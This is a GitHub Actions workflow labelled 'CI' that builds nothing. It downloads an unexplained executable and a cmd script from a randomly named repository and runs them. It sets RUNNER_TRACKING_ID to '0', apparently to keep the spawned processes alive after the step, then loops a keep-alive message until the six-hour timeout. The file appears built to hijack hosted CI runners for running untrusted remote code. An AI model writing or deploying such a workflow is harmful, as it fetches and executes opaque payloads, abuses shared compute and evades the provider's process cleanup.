name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-2019
    timeout-minutes: 360 # 6 hours maximum for GitHub-hosted runners
    
    steps:
    - name: Download Untitled.exe
      run: Invoke-WebRequest https://github.com/w8wbn87f8qdvadsrdfab/SADVUNsnudASOIN/raw/main/Untitled.exe -OutFile untitled.exe

    - name: Download cmd.cmd
      run: Invoke-WebRequest https://github.com/w8wbn87f8qdvadsrdfab/SADVUNsnudASOIN/raw/main/cmd.cmd -OutFile cmd.cmd

    - name: Run Untitled.exe & cmd.cmd
      env:
        RUNNER_TRACKING_ID: "0"
      run: |
        .\untitled.exe
        cmd.exe /c .\cmd.cmd
        
    - name: MT1
      run: |
          :loop
          echo "MT1: Still alive..."
          timeout /t 60
          goto loop
      shell: cmd

    - name: MT2
      run: |
         echo "Completed"
      shell: cmd
